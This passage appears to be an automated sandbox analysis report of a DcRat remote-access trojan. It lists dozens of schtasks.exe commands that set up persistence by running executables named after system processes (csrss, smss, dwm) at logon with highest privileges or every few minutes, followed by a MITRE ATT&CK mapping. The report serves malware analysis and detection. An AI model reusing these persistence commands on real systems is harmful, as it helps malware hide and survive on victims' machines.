- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\explorer.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\explorer.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\explorer.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\1033\dwm.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1496

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\1033\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\1033\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows NT\TableTextService\de-DE\WMIADAP.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Program Files\Windows NT\TableTextService\de-DE\WMIADAP.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1860

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows NT\TableTextService\de-DE\WMIADAP.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1512

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "0a0a64f3c4fa7d960be983aa0a7d0ce80" /sc MINUTE /mo 9 /tr "'C:\Recovery\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1652

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "0a0a64f3c4fa7d960be983aa0a7d0ce8" /sc ONLOGON /tr "'C:\Recovery\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1068

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "0a0a64f3c4fa7d960be983aa0a7d0ce80" /sc MINUTE /mo 11 /tr "'C:\Recovery\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\WMIADAP.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1508

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\WMIADAP.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1092

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\WMIADAP.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\csrss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:580

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MSOCache\All Users\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1096

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:276

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Journal\Templates\smss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\Templates\smss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Journal\Templates\smss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Recovery\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\csrss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2136

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Recovery\5e97ab82-6219-11ed-b9ee-5e34c4ab0fa3\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2180

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\dwm.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2208

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2228

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2256

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "0a0a64f3c4fa7d960be983aa0a7d0ce80" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2284

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "0a0a64f3c4fa7d960be983aa0a7d0ce8" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2300

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "0a0a64f3c4fa7d960be983aa0a7d0ce80" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\0a0a64f3c4fa7d960be983aa0a7d0ce8.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Program Files\Uninstall Information\System.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2352

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2372

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Program Files\Uninstall Information\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2400

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Windows\Microsoft.NET\csrss.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2424

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Microsoft.NET\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2440

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Windows\Microsoft.NET\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2468

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

Persistence

Winlogon Helper DLL

T1004

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

Bypass User Account Control

T1088

Scheduled Task

Defense Evasion

Modify Registry

4

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Credential Access

Discovery

System Information Discovery